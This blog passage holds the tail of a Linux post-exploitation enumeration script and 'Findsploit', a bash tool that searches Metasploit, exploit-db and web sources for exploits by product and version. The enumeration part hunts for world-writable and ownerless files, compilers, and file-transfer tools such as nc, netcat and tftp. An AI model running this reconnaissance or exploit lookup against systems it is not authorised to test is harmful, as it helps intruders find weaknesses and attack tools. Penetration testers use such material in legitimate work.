echo "#####################################################################"
find / -perm -o+w -type d -exec ls -lh {} \; 2>/dev/null
echo ""
echo "#>36 world-writeable files"
echo "#####################################################################"
find / -perm -o+w -type f -exec ls -lh {} \; 2> /dev/null
echo "#>37 Noowner files"
echo "#####################################################################"
find /dir -xdev \( -nouser -o -nogroup \) -print
echo ""
echo "#>38 What development tools/languages are installed/supported?"
echo "#####################################################################"
which perl
which gcc
which g++
which python
which php
which cc
echo ""
echo "#>39 How can files be uploaded?"
echo "#####################################################################"
which wget
which nc
which netcat
which scp
which ftp
which tftp
echo ""
echo "#####################################################################"
echo "#####################################################################"
echo "Done!"
Findsploit Script
#!/bin/bash
# Findsploit 20131223 by 1N3
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
# bmmmd'
#
#
#
# ABOUT
# Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. Currently searches Metasploit, Exploit-db, Google, CVE's, SecurityFocus, 1337day and OSVDB.
# REQUIREMENTS
# This script relies on exploitdb's searchsploit script and files in /pentest/exploits/exploitdb
# INSTALLATION
# 1. Copy the script to /usr/bin
# 2. Run chmod +rx /usr/bin/findsploit
# 3. To run, type findsploit <name of product> <version> <local/remote>
clear
VAR1=$1;
VAR2=$2;
VAR3=$3;
if [ -z "$1" ];
then
echo "(--==== findsploit by nonXero ====---)"
echo "(--==== Usage: findsploit windows xp remote, etc. ====--)"
echo "(--==== http://treadstonesecurity.blogspot.com ====--)"
exit;
else
echo "(--==== findsploit by nonXero ====---)"
echo "(--==== http://treadstonesecurity.blogspot.com ====--)"
echo ""
echo "(--==== METASPLOIT EXPLOITS"
echo ""
egrep -i "$VAR1" /opt/metasploit/apps/pro/msf3/modules/exploits/* -R | grep "Name"
echo ""
echo "(--==== EXPLOITDB EXPLOITS"
echo ""
/pentest/exploits/exploitdb/searchsploit $VAR1 $VAR2 $VAR3
echo ""
echo "(--==== Press any key to search online or Ctrl+C to exit..."
read test
firefox 'http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description='$VAR1'&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=' 2>/dev/null
firefox 'https://www.google.ca/search?q='$VAR1'+'$VAR2'+'$VAR3'+exploit' 2>/dev/null
firefox 'http://www.cvedetails.com/product-search.php?vendor_id=0&search='$VAR1'' 2> /dev/null
firefox 'https://www.google.ca/search?q='$VAR1'+'$VAR2'+'$VAR3'+exploit+site:www.securityfocus.com' 2> /dev/null
firefox 'https://www.google.ca/search?q='$VAR1'+'$VAR2'+'$VAR3'+site:www.1337day.com' 2> /dev/null
firefox 'http://www.osvdb.org/search?search[vuln_title]='$VAR1'&search[text_type]=titles' 2> /dev/null
fi
exit
Subscribe to:
Posts (Atom)